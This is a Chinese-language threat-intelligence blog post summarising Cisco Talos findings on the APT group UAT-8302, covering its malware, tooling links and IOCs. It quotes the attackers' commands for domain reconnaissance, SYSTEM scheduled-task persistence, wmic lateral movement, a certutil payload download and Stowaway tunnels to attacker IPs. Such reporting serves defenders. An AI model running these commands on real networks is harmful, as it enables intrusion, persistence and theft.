文章总结： CiscoTalos评估UAT-8302为具有中国背景的APT组织，主要针对全球政府机构进行长期渗透，通过定制化恶意软件（NetDraft、CloudSorcererv3、VSHELL）和开源工具（Impacket、扫描工具）实现初始入侵、凭证窃取和横向移动。攻击链包括系统侦察、计划任务持久化、侧加载技术及通过GitHub等合法服务获取C2信息。建议加强网络监控、检测异常计划任务和侧加载行为，并及时更新漏洞补丁。 综合评分： 87 文章分类： 威胁情报,恶意软件,渗透测试,应急响应,漏洞分析

解剖 UAT-8302：一个 APT 组织的完整恶意软件图谱

原创

404号浪漫 404号浪漫

404号浪漫

2026年5月11日 21:46 北京

在小说阅读器读本章

去阅读

#

0x01 核心速览

【事件】【影响】

| | | | — | — | | 【事件】 | 【影响】 | | Cisco Talos 评估认为，UAT-8302 是一个具有中国背景的APT组织，长期针对全球政府及相关实体进行入侵，并以信息收集、凭证窃取和网络扩散为主要目标。 | 受害者主要为全球范围内的政府机构及关联实体。攻击者使用多种定制化恶意软件及开源工具进行渗透与横向移动，对目标网络构成持续性严重威胁。 |

0x02 正文解读

2.1-组织归因与背景

高置信度评估 UAT-8302 为具有中国背景的APT组织，其主要任务是获取并维持对全球政府及相关实体的长期访问权限。该组织在入侵后期活动中表现出信息收集、凭证提取和利用现成开源工具（如 Impacket、代理工具及定制化恶意软件）进行扩散的特点。

2.2-初始入侵与侦察

UAT-8302 的工具集与多个以利用零日或N日漏洞获取初始访问权限的APT组织重叠，Talos 评估其遵循相同范式。初始入侵得手后，攻击者使用 Impacket 等红队工具进行初步侦察，并执行大量命令枚举主机、域、网络共享及信任关系。侦察过程中使用自定义 PowerShell 脚本（如 “whatpc.ps1”），并通过计划任务持久化该系统信息收集脚本。此外，攻击者还执行 Ping 扫描和 SMB 端口扫描，以发现更多可扩散端点。

[图 初步侦查]

• 其它侦察指令

ipconfig /allcertutil -user -store Mycertutil -user -store CAcertutil -user -store Rootwhoaminslookup www[.]google[.]comnet usecmd.exe /c net view /domaincmd.exe /c systeminfocmd.exe /c net time /domaincmd.exe /c nslookup -type=SRV _ldap._tcp

• 自定义的 PowerShell 脚本

powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Windows\Temp\whatpc.ps1The script may be persisted to collect system information via a scheduled task:cmd.exe /c schtasks /create /tn 'ReconLiteDebug' /tr 'powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File c:\windows\temp\whatpc.ps1' /sc ONCE /st 08:25 /ru SYSTEM /fcmd.exe /c schtasks /create /tn 'RunWhatPC' /tr 'c:\windows\temp\run.bat' /sc ONCE /st 23:28 /ru SYSTEM /f

• 网络进行 ping 扫描

C:/Windows/Temp/ping_scan.batC:/Windows/Temp/run_scan.batC:/Windows/Temp/nbtscan.execmd.exe /Q /c (for /l %i in (1,1,254) do @ping -n 1 -w 300 192.168.1.%i | find TTL= && echo 192.168.1.%i is alive) > C:\Windows\Temp\alive_hosts.txt

• SMB共享

cmd.exe /Q /c (for /l %i in (1,1,254) do @net use \\192.168.1.%i\IPC$ >nul 2>&1 && echo 192.168.1.%i - Port 445 is open || echo 192.168.1.%i - Port 445 is closed) > C:\Windows\Temp\portscan.txt

• 泛查询审计策略以获取系统日志记录配置：

auditpol /get /category:Logon/Logoffauditpol /get /category:*

• 使用 AD Explorer 等工具收集 AD 快照：

ae.exe -snapshot c:\windows\temp\result.dat /accepteulacmd.exe /C 7zr.exe a -mx=5 c:\windows\temp\r.7z c:\windows\temp\result.dat

还使用了一个用简体中文编写的工具，名为“ SharpGetUserLoginIPRP ”，该工具源自另一个中文存储库，用于从域控制器提取登录信息：

C:\ProgramData\S.exe 用户:密码@IP -day

• “` 使用基于 Impacket 或 WMI 的远程进程创建方式，在各种端点上扩散：

cmd.exe /C wmic /node:IP process call create cmd.exe /c c:\programdata\e1.batcmd.exe /C schtasks /S IP /U username /P passwd /create /tn ‘Runbat’ /tr ‘c:\windows\temp\run.bat’ /sc ONCE /st 5:12 /ru SYSTEM /f

使用MobaXtermDecryptor等工具从多功能标签式 SSH 客户端 MobaxXterm 中提取登录凭据，从而跳转到其他端点。

* 通过 PowerShell 直接查询 AD 用户和计算机对象，从中获取信息

powershell -command Get-ADUser -Filter  -Property  | Select-Object Name, Displayname, LastLogonDate, PasswordLastSet, PasswordExpired, Description, EmailAddress, homeDirectory, scriptPathpowershell -command Get-ADUser -Filter  -Property  | Select-Object SamAccountName, DisplayName, Enabled, LastLogonDate, PasswordLastSet, PasswordExpired, Description, EmailAddress, HomeDirectory, ScriptPath, @{Name=’Groups’;Expression={((Get-ADUser $.SamAccountName -Properties MemberOf).MemberOf | ForEach-Object { ($ -split ‘,’)[0] -replace ‘^CN=’ }) -join ‘; ‘}}powershell -Command Get-ADComputer -Filter  -Property Name,DNSHostName,OperatingSystem,Description | Select-Object Name, DNSHostName, OperatingSystem, Description | Format-Table -AutoSizepowershell -Command Get-ADGroup -Filter  -Properties Members, Description | Select-Object Name, Description, @{Name=’Members’;Expression={ ($.Members | ForEach-Object { ($ -split ‘,’)[0] -replace ‘^CN=’ }) -join ‘; ‘ }}| Format-Table -AutoSize

在多个端点上收集事件日志信息及日志本身。日志是获取信息并了解目标环境中应用的安全配置和策略的绝佳来源：

powershell -Command Get-WinEvent -ListLog Security | Format-List LogName, FileSize, LogMode, MaximumSizeInBytes, RecordCountpowershell -command Get-EventLog -LogName System -Source NETLOGON -Newest 5000 | Where-Object { $.Message -match “Administrator” }powershell -Command chcp 437 >$null; Get-WinEvent -FilterHashtable @{ LogName = ‘Security’; ID = 4768 } | Where-Object { \$.Message -match ‘Administrador’ }

UAT-8302 还可能会下载并运行 "gogo"和多种扫描工具，如 QScan、naabu、dddd、PortQry 和 httpx，来发现网络中的服务：

curl -fsSL hxxps://github[.]com/chainreactors/gogo/releases/download/v2.14.0/gogowindowsamd64.exe -o go.exehttpx.exe -sc -title -location -f -td -r 192.168.1.1/16httpx.exe -sc -title -location -td -r 192.168.1.1/16 -o web.txthttpx.exe -sc -title -location -td -u 192.168.1.1/16 -o web.txt

### 2.4-定制化恶意软件部署：多家族利用

UAT-8302 部署的恶意软件家族包括 NetDraft、CloudSorcerer v3 和 VSHELL。NetDraft（亦称 NosyDoor）是基于 .NET 的 FINALDRAFT/Squidoor 变种，利用 MS Graph API 与 OneDrive C2 通信，通过 DLL 侧加载和数据文件解码启动，并依赖内嵌的 .NET 辅助库（Talos 跟踪为 “FringePorch”）执行命令、文件操作、加载插件等，其持久化通过计划任务实现。CloudSorcerer v3 同样通过侧加载三元组执行，根据注入进程名称（如 dpapimig.exe、spoolsv.exe）分派不同恶意行为，C2 信息通过读取GitHub  仓库或 GameSpot 资料页获取，并具备系统信息收集功能。VSHELL 则通过侧加载 wininet.dll 和 BIN 文件注入 explorer.exe，其下载器为 SNOWLIGHT（单字节 XOR 0x99），部分实例还使用了基于 Rust 的变种 SNOWRUST。

*[NetDraft 和 FringePorch 感染链]*

![](https://mmbiz.qpic.cn/mmbiz_jpg/eefCd8vibaic2eqabACC24fHJRzRnu3ZUKZaF32JKXoMhXBVoqZHANe1mFR2LupEfpcicaFKP8L2TLn8kSX6gOprP6oibNxhicOv7QUZzHdiaKXpQ/640?wx_fmt=jpeg&from=appmsg&watermark=1#imgIndex=1)

* etDraft 和 FringePorch 支持以下功能：

1. 在端点上执行任意命令2. 在 NetDraft 的进程上下文中执行由 C2 发送的基于 .NET 的程序集3. 退出并停止执行4. 将文件上传到 C25. 将指定远程位置的文件下载到本地磁盘。6. 文件管理：更改当前工作目录、重命名文件、枚举文件以及设置写入时间延迟7. 执行 .NET 插件：此功能类似于运行任意 .NET 程序集的能力。在此，植入程序会运行所提供的插件的“Plugin.Run”函数。

由于 NetDraft 不具备在重启和重新登录后保持运行的能力，因此 C2 服务器向其发出的首批命令之一就是创建一个恶意计划任务：

schtasks /create /ru system /tn Microsoft\Windows\Maps{a086ff1e-d6dc-45f7-b3e4-6udknw82sa} /sc hourly /mo 2 /tr ‘C:\ProgramData\Microsoft\Microsoft\Appunion.exe’ /F

UAT-8302部署的另一种恶意软件是最新版本的CloudSorcerer后门（版本3）。该恶意软件由三个侧载文件组成：一个正常文件、一个恶意的基于DLL的加载器以及一个数据文件中的实际植入程序。

Yandex.exe -r -p:test.ini -s:12   VMtools.exe -r -p:VM.ini -s:12

这些可执行文件会侧载一个名为“mspdb60[.]dll”的DLL文件 ，该DLL文件会加载并解密命令行中指定的“.ini”文件，例如“test.ini”或“vm.ini”。然后，解密后的shellcode会被注入到一组指定的良性进程中。

* #### CloudSorcerer v3 – 解密后的 shellcode

解密后的 INI 文件是卡巴斯基在 2024 年披露的CloudSorcerer (v3)的较新版本。根据进程名称（可能是其启动或注入的位置），CloudSorcerer v3 将执行以下操作之一：

1. 如果进程名为“dpapimig.exe”，则它将收集系统信息，将自身注入到 explorer.exe 中，并通过命名管道从 C2 接收命令代码，收集磁盘信息，枚举文件，执行任意命令，执行文件操作（删除、重命名、读取、写入等），并执行通过命名管道接收的 shellcode。2. 如果进程名为“spoolsv.exe”，则它将联系 GitHub 以获取 C2 信息并从 C2 接收命令。3. 如果进程名为“mspaint.exe”、“browser”或其他任何名称，它将把自己注入到 dpapimg.exe、spoolsv.exe 等进程中，以启动其恶意操作。

CloudSorcerer v3 收集的系统信息包括计算机名称、用户名和本地系统时间。

* ##### 获取C2信息

与CloudSorcerer v2类似，版本 3 也会联系合法服务以获取 C2 信息。该恶意软件会联系特定的 GitHub 代码库读取数据块，或者读取攻击者设置的 GameSpot 个人资料。对数据块进行解码以获取 C2 信息，根据 CloudSorcerer 后门的变体，该信息可以采用以下格式之一：

1. UAT-8302 控制的域名或 IP 地址对应的 C2 URL，恶意软件使用该 URL 与 C2 服务器建立通信，以执行恶意操作。2. UAT-8302 使用该合法服务（例如 OneDrive 或 Dropbox）的访问令牌，作为其 C2 基础设施，以获取下一阶段的有效载荷和命令

### 2.5-其他工具与代理后门

1-UAT-8302 在入侵中结合使用了 SNAPPYBEE/DeedRAT 与 ZingDoor 的组合，并部署了 Draculoader（通用 shellcode 加载器）。为维持后门访问，该组织在失陷主机上部署 Stowaway、anyproxy 等代理工具以及 SoftEther VPN 客户端，以隧道方式穿越网络边界。

2-在一次事件中，UAT-8302 首先部署了名为DeedRAT / SNAPPYBEE的 RAT 家族。然而，UAT-8302 几乎立即切换到了名为ZingDoor 的基于 DLL 的恶意软件家族，该家族由趋势科技于 2023 年首次披露，趋势科技已将DeedRAT 和 ZingDoor都归咎于与中国有关联的威胁行为体Earth Estries。

3-ZingDoor 也曾在 2025 年被中国威胁组织成功利用 ToolShell 漏洞后部署。

4-与此同时，UAT-8302 还部署了 Draculoader，这是一种通用 shellcode 加载器，Earth Estries和Earth Naga APT 组织也曾使用过该加载器，这些组织有攻击东南亚及其他地区政府机构的历史：

C:\Documents and Settings\All Users\Microsoft\Crypto\RSA\d3d8.dll

### 设置额外的后门访问方式

UAT-8302部署其定制恶意软件后，便开始建立其他后门访问途径。其中一种技术是在受感染的系统上设置代理服务器，利用诸如Stowaway（另一个用简体中文编写的工具）之类的工具，将企业外部的流量隧道传输到受感染的主机：

c:\windows\system32\wagent.exe -c 85[.]209[.]156[.]3:56456cmd.exe /c (echo @echo off && start c:\windows\temp\mmc.exe -l 85[.]209[.]156[.]3:56456 -s && echo exit) > c:\windows\temp\trun.batag531.exe -c 45[.]135[.]135[.]100:443 -s -f AgreedUponByAllParties

UAT-8302 可能使用其他工具（例如anyproxy）在受感染企业的网络中设置代理：

c:\users\public\any.exe

此外，还观察到 UAT-8302 也部署了 SoftEther VPN 客户端：

certutil -urlcache -split -f hxxp://38[.]54[.]32[.]244/Rar.exe rar.exerar.exe x glb.rarCommunicator.exe /usermode

## 2.6-与其它中国APT组织的工具重叠与关联

UAT-8302 使用的多款恶意软件与多个已知的中国 APT 组织存在高度重叠，表明该组织可获取并复用这些组织的工具集。主要重叠包括：

1. NetDraft（NosyDoor）：  .NET 版 FinalDraft/SquidDoor，被 LongNosedGoblin 用于攻击东南亚和日本政府，也被 Erudite Mogwai 用于俄罗斯 IT 目标。2. CloudSorcerer：  卡巴斯基披露其曾被用于 2024 年攻击俄罗斯政府实体。3. SNAPPYBEE/DeedRAT + ZingDoor：  趋势科技曾报告过同样的组合使用。4. Draculoader：  通用 shellcode 加载器，被 Earth Estries 和 Earth Naga 使用。5. SNOWLIGHT：  VSHELL 的部署器，被 UAT-6382 利用 Cityworks 零日漏洞（CVE-2025-0994）投放 VSHELL，也见于 UNC5174、UNC6586 等集群。 “`

[UAT-8302 与其他威胁行为者之间的各种联系]

#

0x03 动作指引

3.1-IOC指标

| IOC指标 | 说明 | | — | — | | 1139b39d3cc151ddd3d574617cf113608127850197e9695fef0b6d78df82d6ca | NetDraft / FringePorch | | Ee56c49f42522637f401d15ac2a2b6f3423bfb2d5d37d071f0172ce9dc688d4b | NetDraft / FringePorch | | 51f0cf80a56f322892eed3b9f5ecae45f1431323600edbaea5cd1f28b437f6f2 | NetDraft / FringePorch | | 35b2a5260b21ddb145486771ec2b1e4dc1f5b7f2275309e139e4abc1da0c614b | VSHELL | | 199bd156c81b2ef4fb259467a20eacaa9d861eeb2002f1570727c2f9ff1d5dab | VSHELL | | 071e662fc5bc0e54bcfd49493467062570d0307dc46f0fb51a68239d281427c6 | ZingDoor | | E74098b17d5d95e0014cf9c7f41f2a4e4be8baefc2b0eb42d39ae05a95b08ea5 | gogo | | 2b627f6afe1364a7d0d832ccba87ef33a8a39f30a70a5f395e2a3cb0e2161cb3 | gogo | | 7c593ca40725765a0747cc3100b43a29b88ad1708ef77e915ab02686c0153001 | Stowaway | | F859a67ceebc52f0770a222b85a5002195089ee442eac4bea761c29be994e2ea | Stowaway | | 7d9c70fc36143eb33583c30430dcb40cf9d306067594cc30ffd113063acd6292 | anypoxy | | 1bb59491f7289b94ab0130d7065d74d2459a802a7550ebf8cd0828f0a09c4d38 | QScan | | 843f8aea7842126e906cadbad8d81fa456c184fb5372c6946978a4fe115edb1c | DracuLoader | | 3dec6703b2cbc6157eb67e80061d27f9190c8301c9dd60eb0be1e8b096482d7e | SoftEther VPN | | 9f115e9b32111e4dc29343a2671ab10a2b38448657b24107766dc14ce528fceb | SharpGetUserLoginRDP | | b19bfca2fc3fdabf0d0551c2e66be895e49f92aedac56654b1b0f51ec66e7404 | SharpGetUserLoginRDP | | Fb6cebadd49d202c8c7b5cdd641bd16aac8258429e8face365a94bd32e253b00 | PortQry | | www[.]drivelivelime[.]com | NetDraft C2 domain | | www[.]drivelivelime[.]com/x | NetDraft C2 URL | | www[.]drivelivelime[.]com/p | NetDraft C2 URL | | msiidentity[.]com | C2 domain | | msiidentity[.]com/pw | C2 URL | | trafficmanagerupdate[.]com | C2 domain | | trafficmanagerupdate[.]com/index[.]php | C2 URL | | update-kaspersky[.]workers[.]dev | C2 domain (Cloudflare Worker) | | 85[.]209[.]156[.]3 | Stowaway proxy / C2 server | | 85[.]209[.]156[.]3:8080/wagent[.]exe | Malware download URL | | 85[.]209[.]156[.]3:8082/wagent[.]exe | Malware download URL | | 185[.]238[.]189[.]41 | C2 server | | 103[.]27[.]108[.]55:48265/ | C2 server | | 38[.]54[.]32[.]244 | Malware staging server | | 38[.]54[.]32[.]244/Rar[.]exe | RAR archive download | | 45[.]140[.]168[.]62 | C2 server | | 88[.]151[.]195[.]133 | C2 server | | 156[.]238[.]224[.]82 | C2 server | | 45[.]135[.]135[.]100 | C2 server (anypoxy) |

3.3-后续处置建议

建议用户使用上述 IOC 进行威胁狩猎，并核查系统是否执行过相关恶意计划任务、异常 PowerShell 命令或存在可疑 DLL 侧加载文件。如发现入侵迹象，应立即隔离受感染主机，重置凭据，并对同一信任域内所有系统进行全面扫描。

0x04 参考链接

1.https://blog.talosintelligence.com/uat-8302/

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：404号浪漫 404号浪漫 404号浪漫《解剖 UAT-8302：一个 APT 组织的完整恶意软件图谱》